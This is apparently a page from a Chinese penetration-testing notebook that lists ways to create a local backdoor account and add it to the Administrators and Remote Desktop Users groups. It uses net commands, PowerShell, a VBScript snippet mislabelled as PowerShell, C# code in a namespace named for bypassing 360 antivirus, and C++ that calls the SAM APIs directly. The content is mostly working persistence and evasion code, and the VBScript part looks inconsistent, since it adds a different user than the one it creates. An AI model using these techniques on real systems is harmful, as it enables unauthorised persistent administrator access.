新建用户

新建用户并添加管理员及远程访问权限

命令行:

net user qwqdanchun password /add /y
net localgroup administrators qwqdanchun /add
net localgroup "remote desktop users" qwqdanchun /add

Powershell:

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","qwqdanchun")
od.SetPassword "password"
od.SetInfo
Set of=GetObject(os&"/admin",user)
oe.add os&"/admin"

Powershell(另一个版本):

$Username = "qwqdanchun"
$P = "password"
$Password = ConvertTo-SecureString $P -AsPlainText -Force
New-LocalUser $Username -Password $Password -FullName "test account" -Description "test user."
Add-LocalGroupMember -Group "administrators" -Member "qwqdanchun"

c#(使用系统 API 函数):

using System;
using System.Runtime.InteropServices;
namespace Bypass360Add
{
    public static class BypassUAC_csharp
    {
        [DllImport("kernel32.dll")]
        static extern void ExitProcess(uint uExitCode);
        public static void Main(string[] args)
        {
            LocalGroupUserHelper local = new LocalGroupUserHelper();
            string username = "qwqdanchun";
            string password = "password";
            string groupname = "Administrators";
            local.AddUser(null, username, password, null);
            local.GroupAddMembers(null, groupname, username);
            ExitProcess(1);
        }
    }
    public class LocalGroupUserHelper
    {
        [DllImport("Netapi32.dll")]
        extern static int NetUserAdd([MarshalAs(UnmanagedType.LPWStr)] string servername, int level, ref USER_INFO_1 buf, int parm_err);
        [DllImport("Netapi32.dll")]
        extern static int NetLocalGroupAddMembers([MarshalAs(UnmanagedType.LPWStr)] string servername, [MarshalAs(UnmanagedType.LPWStr)] string groupname,
         int level, ref LOCALGROUP_MEMBERS_INFO_3 buf, int totalentries);
        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct LOCALGROUP_MEMBERS_INFO_3
        {
            public string domainandname; // //lgrmi3_domainandname
        }
       [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        public struct USER_INFO_1
        {
            public string usri1_name;
            public string usri1_password;
            public int usri1_password_age;
            public int usri1_priv;
            public string usri1_home_dir;
            public string comment;
            public int usri1_flags;
            public string usri1_script_path;
        }
        public void AddUser(string serverName, string userName, string password, string strComment)
        {
            USER_INFO_1 NewUser = new USER_INFO_1(); //创建一个USER_INFO_1实例
            NewUser.usri1_name = userName; // Allocates the username
            NewUser.usri1_password = password; // allocates the password
            NewUser.usri1_priv = 1; // Sets the account type to USER_PRIV_USER
            NewUser.usri1_home_dir = null; // We didn't supply a Home Directory
            NewUser.comment = strComment; // Comment on the User
            NewUser.usri1_script_path = null; // We didn't supply a Logon Script Path
            if (NetUserAdd(serverName, 1, ref NewUser, 0) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding User");
            }
        }
        public void GroupAddMembers(string serverName, string groupName, string userName)
        {
            LOCALGROUP_MEMBERS_INFO_3 NewMember = new LOCALGROUP_MEMBERS_INFO_3();
            NewMember.domainandname = userName;
            if (NetLocalGroupAddMembers(serverName, groupName, 3, ref NewMember, 1) != 0) //添加失败后返回非0
            {
                Console.WriteLine("Error Adding Group Member"); 
            }
        }
    }
}

c++(重写AddUser):

#include "ApiAddUser.h"



int wmain(int argc, wchar_t* argv[])
{
    UNICODE_STRING UserName;
    UNICODE_STRING PassWord;
    HANDLE ServerHandle = NULL;
    HANDLE DomainHandle = NULL;
    HANDLE UserHandle = NULL;
    ULONG GrantedAccess;
    ULONG RelativeId;
    NTSTATUS Status = NULL;
    HMODULE hSamlib = NULL;
    HMODULE hNtdll = NULL;
    HMODULE hNetapi32 = NULL;
    LSA_HANDLE hPolicy = NULL;
    LSA_OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
    PPOLICY_ACCOUNT_DOMAIN_INFO DomainInfo = NULL;
    USER_ALL_INFORMATION uai = { 0 };


    hSamlib = LoadLibraryA("samlib.dll");
    hNtdll = LoadLibraryA("ntdll");

    pSamConnect SamConnect = (pSamConnect)GetProcAddress(hSamlib, "SamConnect");
    pSamOpenDomain SamOpenDomain = (pSamOpenDomain)GetProcAddress(hSamlib, "SamOpenDomain");
    pSamCreateUser2InDomain SamCreateUser2InDomain = (pSamCreateUser2InDomain)GetProcAddress(hSamlib, "SamCreateUser2InDomain");
    pSamSetInformationUser SamSetInformationUser = (pSamSetInformationUser)GetProcAddress(hSamlib, "SamSetInformationUser");
    pSamQuerySecurityObject SamQuerySecurityObject = (pSamQuerySecurityObject)GetProcAddress(hSamlib, "SamQuerySecurityObject");
    pRtlInitUnicodeString RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");

    RtlInitUnicodeString(&UserName, L"Admin");
    RtlInitUnicodeString(&PassWord, L"Admin");

    Status = SamConnect(NULL, &ServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_LOOKUP_DOMAIN, NULL);;
    Status = LsaOpenPolicy(NULL,&ObjectAttributes,POLICY_VIEW_LOCAL_INFORMATION,&hPolicy);
    Status = LsaQueryInformationPolicy(hPolicy, PolicyAccountDomainInformation, (PVOID*)&DomainInfo);

    Status = SamOpenDomain(ServerHandle, 
        DOMAIN_CREATE_USER | DOMAIN_LOOKUP | DOMAIN_READ_PASSWORD_PARAMETERS, 
        DomainInfo->DomainSid, 
        &DomainHandle);

    Status = SamCreateUser2InDomain(DomainHandle,
        &UserName,
        USER_NORMAL_ACCOUNT,
        USER_ALL_ACCESS | DELETE | WRITE_DAC,
        &UserHandle,&GrantedAccess,&RelativeId);

    RtlInitUnicodeString(&uai.NtPassword, PassWord.Buffer);
    uai.NtPasswordPresent = TRUE;
    uai.WhichFields |= USER_ALL_NTPASSWORDPRESENT;


    Status = SamSetInformationUser(UserHandle,
        UserAllInformation,
        &uai);

    return 0;
}

最后更新于